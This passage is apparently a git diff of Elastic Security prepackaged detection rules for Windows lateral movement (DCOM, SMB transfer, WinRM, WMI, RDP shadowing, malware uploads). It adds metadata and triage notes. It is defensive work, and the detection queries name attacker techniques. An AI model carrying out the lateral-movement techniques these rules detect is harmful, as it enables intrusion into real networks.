maxspan=1m\n [process where event.type in (\"start\", \"process_started\") and\n process.name : \"mshta.exe\" and process.args : \"-Embedding\"\n ] by host.id, process.entity_id\n [network where event.type == \"start\" and process.name : \"mshta.exe\" and \n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port > 49151 and destination.port > 49151 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n", + "query": "sequence with maxspan=1m\n [process where event.type in (\"start\", \"process_started\") and\n process.name : \"mshta.exe\" and process.args : \"-Embedding\"\n ] by host.id, process.entity_id\n [network where event.type == \"start\" and process.name : \"mshta.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port > 49151 and destination.port > 49151 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n", "references": [ "https://codewhitesec.blogspot.com/2018/07/lethalhta.html" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "source.port", + "type": "long" + } + ], "risk_score": 73, "rule_id": "622ecb68-fa81-4601-90b5-f8cd661e4520", "severity": "high", @@ -59,7 +111,7 @@ "technique": [ { "id": "T1218", - "name": "Signed Binary Proxy Execution", + "name": "System Binary Proxy Execution", "reference": "https://attack.mitre.org/techniques/T1218/", "subtechnique": [ { @@ -73,5 +125,5 @@ } ], "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_dcom_mmc20.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_dcom_mmc20.json index a44185290f41d..c8c03056d5f53 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_dcom_mmc20.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_dcom_mmc20.json @@ -16,6 +16,63 @@ "references": [ "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "source.port", + "type": "long" + } + ], "risk_score": 73, "rule_id": "51ce96fb-9e52-4dad-b0ba-99b54440fc9a", "severity": "high", @@ -51,5 +108,5 @@ } ], "type": "eql", - "version": 5 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_dcom_shellwindow_shellbrowserwindow.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_dcom_shellwindow_shellbrowserwindow.json index aed31f6b2f903..cca0c29958236 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_dcom_shellwindow_shellbrowserwindow.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_dcom_shellwindow_shellbrowserwindow.json @@ -16,6 +16,63 @@ "references": [ "https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "source.port", + "type": "long" + } + ], "risk_score": 47, "rule_id": "8f919d4b-a5af-47ca-a594-6be59cd924a4", "severity": "medium", @@ -51,5 +108,5 @@ } ], "type": "eql", - "version": 5 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_defense_evasion_lanman_nullsessionpipe_modification.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_defense_evasion_lanman_nullsessionpipe_modification.json index 25b6e42b2312f..dd55e8e459519 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_defense_evasion_lanman_nullsessionpipe_modification.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_defense_evasion_lanman_nullsessionpipe_modification.json @@ -15,6 +15,18 @@ "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/", "https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-access-restrict-anonymous-access-to-named-pipes-and-shares" ], + "required_fields": [ + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "ddab1f5f-7089-44f5-9fda-de5b11322e77", "severity": "medium", @@ -51,5 +63,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_direct_outbound_smb_connection.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_direct_outbound_smb_connection.json index c9983d2ba186e..3c2dad390ebbd 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_direct_outbound_smb_connection.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_direct_outbound_smb_connection.json @@ -12,7 +12,35 @@ "language": "eql", "license": "Elastic License v2", "name": "Direct Outbound SMB Connection", + "note": "## Triage and analysis\n\n### Investigating Direct Outbound SMB Connection\n\nThis rule looks for unexpected processes making network connections over port 445. Windows file sharing is typically\nimplemented over Server Message Block (SMB), which communicates between hosts using port 445. When legitimate, these\nnetwork connections are established by the kernel (PID 4). Occurrences of non-system processes using this port can indicate\nport scanners, exploits, and tools used to move laterally on the environment.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate abnormal behaviors observed by the subject process such as network connections, registry or file\nmodifications, and any spawned child processes.\n- Retrieve the process executable and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination\nof user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where event.type == \"start\" and process.pid != 4]\n [network where destination.port == 445 and process.pid != 4 and\n not cidrmatch(destination.ip, \"127.0.0.1\", \"::1\")]\n", + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + } + ], "risk_score": 47, "rule_id": "c82c7d8f-fb9e-4874-a4bd-fd9e3f9becf1", "severity": "medium", @@ -48,5 +76,5 @@ } ], "type": "eql", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_dns_server_overflow.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_dns_server_overflow.json index 48b2151176b1e..eb8a008602cb8 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_dns_server_overflow.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_dns_server_overflow.json @@ -20,6 +20,38 @@ "https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/", "https://github.com/maxpl0it/CVE-2020-1350-DoS" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.bytes", + "type": "long" + }, + { + "ecs": false, + "name": "type", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "11013227-0301-4a8c-b150-4db924484475", "severity": "medium", @@ -48,5 +80,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 7 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_evasion_rdp_shadowing.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_evasion_rdp_shadowing.json index 4787ab253a04a..8fcea678e6bc2 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_evasion_rdp_shadowing.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_evasion_rdp_shadowing.json @@ -12,14 +12,47 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Remote Desktop Shadowing Activity", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "/* Identifies the modification of RDP Shadow registry or\n the execution of processes indicative of active shadow RDP session */\n\nany where \n (event.category == \"registry\" and\n registry.path : \"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\Shadow\"\n ) or\n (event.category == \"process\" and \n (process.name : (\"RdpSaUacHelper.exe\", \"RdpSaProxy.exe\") and process.parent.name : \"svchost.exe\") or\n (process.pe.original_file_name : \"mstsc.exe\" and process.args : \"/shadow:*\")\n )\n", + "note": "", + "query": "/* Identifies the modification of RDP Shadow registry or\n the execution of processes indicative of active shadow RDP session */\n\nany where\n (event.category == \"registry\" and\n registry.path : \"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\Shadow\"\n ) or\n (event.category == \"process\" and\n (process.name : (\"RdpSaUacHelper.exe\", \"RdpSaProxy.exe\") and process.parent.name : \"svchost.exe\") or\n (process.pe.original_file_name : \"mstsc.exe\" and process.args : \"/shadow:*\")\n )\n", "references": [ "https://bitsadm.in/blog/spying-on-users-using-rdp-shadowing", "https://swarm.ptsecurity.com/remote-desktop-services-shadowing/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "c57f8579-e2a5-4804-847f-f2732edc5156", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -47,5 +80,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_executable_tool_transfer_smb.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_executable_tool_transfer_smb.json index a6297dba18540..05efa4319e9e6 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_executable_tool_transfer_smb.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_executable_tool_transfer_smb.json @@ -14,6 +14,53 @@ "name": "Potential Lateral Tool Transfer via SMB Share", "note": "## Triage and analysis\n\n### Investigating Potential Lateral Tool Transfer via SMB Share\n\nAdversaries can use network shares to host tooling to support the compromise of other hosts in the environment. These tools\ncan include discovery utilities, credential dumpers, malware, etc. Attackers can also leverage file shares that employees\nfrequently access to host malicious files to gain a foothold in other machines.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve the created file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity can happen legitimately. Consider adding exceptions if it is expected and noisy in your environment.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges needed to write to the network share and restrict write access as needed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n", "query": "sequence by host.id with maxspan=30s\n [network where event.type == \"start\" and process.pid == 4 and destination.port == 445 and\n network.direction : (\"incoming\", \"ingress\") and\n network.transport == \"tcp\" and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by process.entity_id\n /* add more executable extensions here if they are not noisy in your environment */\n [file where event.type in (\"creation\", \"change\") and process.pid == 4 and file.extension : (\"exe\", \"dll\", \"bat\", \"cmd\")] by process.entity_id\n", + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + } + ], "risk_score": 47, "rule_id": "58bc134c-e8d2-4291-a552-b4b3e537c60b", "severity": "medium", @@ -54,5 +101,5 @@ } ], "type": "eql", - "version": 5 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_execution_from_tsclient_mup.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_execution_from_tsclient_mup.json index ae2561a0b5cd4..ebfbcee0db4aa 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_execution_from_tsclient_mup.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_execution_from_tsclient_mup.json @@ -12,13 +12,26 @@ "language": "eql", "license": "Elastic License v2", "name": "Execution via TSClient Mountpoint", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and process.executable : \"\\\\Device\\\\Mup\\\\tsclient\\\\*.exe\"\n", "references": [ "https://posts.specterops.io/revisiting-remote-desktop-lateral-movement-8fb905cb46c3" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "4fe9d835-40e1-452d-8230-17c147cafad8", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -46,5 +59,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_execution_via_file_shares_sequence.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_execution_via_file_shares_sequence.json index 5ae7aa4063a67..410a717430f11 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_execution_via_file_shares_sequence.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_execution_via_file_shares_sequence.json @@ -16,6 +16,38 @@ "references": [ "https://blog.menasec.net/2020/08/new-trick-to-detect-lateral-movement.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + } + ], "risk_score": 47, "rule_id": "ab75c24b-2502-43a0-bf7c-e60e662c811e", "severity": "medium", @@ -51,5 +83,5 @@ } ], "type": "eql", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_incoming_winrm_shell_execution.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_incoming_winrm_shell_execution.json index 1599836d7b7b0..db8ec87c7c65b 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_incoming_winrm_shell_execution.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_incoming_winrm_shell_execution.json @@ -16,6 +16,53 @@ "license": "Elastic License v2", "name": "Incoming Execution via WinRM Remote Shell", "query": "sequence by host.id with maxspan=30s\n [network where process.pid == 4 and network.direction : (\"incoming\", \"ingress\") and\n destination.port in (5985, 5986) and network.protocol == \"http\" and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ]\n [process where event.type == \"start\" and process.parent.name : \"winrshost.exe\" and not process.name : \"conhost.exe\"]\n", + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + } + ], "risk_score": 47, "rule_id": "1cd01db9-be24-4bef-8e7c-e923f0ff78ab", "severity": "medium", @@ -44,5 +91,5 @@ } ], "type": "eql", - "version": 4 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_incoming_wmi.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_incoming_wmi.json index 2430477e7df28..d5015b708a136 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_incoming_wmi.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_incoming_wmi.json @@ -13,6 +13,53 @@ "license": "Elastic License v2", "name": "WMI Incoming Lateral Movement", "query": "sequence by host.id with maxspan = 2s\n\n /* Accepted Incoming RPC connection by Winmgmt service */\n\n [network where process.name : \"svchost.exe\" and network.direction : (\"incoming\", \"ingress\") and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\" and source.port >= 49152 and destination.port >= 49152\n ]\n\n /* Excluding Common FPs Nessus and SCCM */\n\n [process where event.type in (\"start\", \"process_started\") and process.parent.name : \"WmiPrvSE.exe\" and\n not process.args : (\"C:\\\\windows\\\\temp\\\\nessus_*.txt\", \n \"C:\\\\windows\\\\TEMP\\\\nessus_*.TMP\", \n \"C:\\\\Windows\\\\CCM\\\\SystemTemp\\\\*\", \n \"C:\\\\Windows\\\\CCMCache\\\\*\", \n \"C:\\\\CCM\\\\Cache\\\\*\")\n ]\n", + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "source.port", + "type": "long" + } + ], "risk_score": 47, "rule_id": "f3475224-b179-4f78-8877-c2bd64c26b88", "severity": "medium", @@ -50,5 +97,5 @@ } ], "type": "eql", - "version": 4 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_malware_uploaded_onedrive.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_malware_uploaded_onedrive.json index 37f2066e7b9b4..8a49ea25858fe 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_malware_uploaded_onedrive.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_malware_uploaded_onedrive.json @@ -14,13 +14,42 @@ "language": "kuery", "license": "Elastic License v2", "name": "OneDrive Malware File Upload", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:o365.audit and event.provider:OneDrive and event.code:SharePointFileOperation and event.action:FileMalwareDetected\n", "references": [ "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/virus-detection-in-spo?view=o365-worldwide" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "bba1b212-b85c-41c6-9b28-be0e5cdfc9b1", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "high", "tags": [ "Elastic", @@ -49,5 +78,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_malware_uploaded_sharepoint.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_malware_uploaded_sharepoint.json index 4a114e592b260..5f5ff52d73d60 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_malware_uploaded_sharepoint.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_malware_uploaded_sharepoint.json @@ -14,13 +14,42 @@ "language": "kuery", "license": "Elastic License v2", "name": "SharePoint Malware File Upload", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:o365.audit and event.provider:SharePoint and event.code:SharePointFileOperation and event.action:FileMalwareDetected\n", "references": [ "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/virus-detection-in-spo?view=o365-worldwide" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "0e52157a-8e96-4a95-a6e3-5faae5081a74", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "high", "tags": [ "Elastic", @@ -49,5 +78,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_mount_hidden_or_webdav_share_net.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_mount_hidden_or_webdav_share_net.json index e09b06bd42387..cd4d905d2367b 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_mount_hidden_or_webdav_share_net.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_mount_hidden_or_webdav_share_net.json @@ -12,10 +12,38 @@ "language": "eql", "license": "Elastic License v2", "name": "Mounting Hidden or WebDav Remote Shares", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n ((process.name : \"net.exe\" or process.pe.original_file_name == \"net.exe\") or ((process.name : \"net1.exe\" or process.pe.original_file_name == \"net1.exe\") and\n not process.parent.name : \"net.exe\")) and\n process.args : \"use\" and\n /* including hidden and webdav based online shares such as onedrive */\n process.args : (\"\\\\\\\\*\\\\*$*\", \"\\\\\\\\*@SSL\\\\*\", \"http*\") and\n /* excluding shares deletion operation */\n not process.args : \"/d*\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14", + "setup": "If enabling an EQL 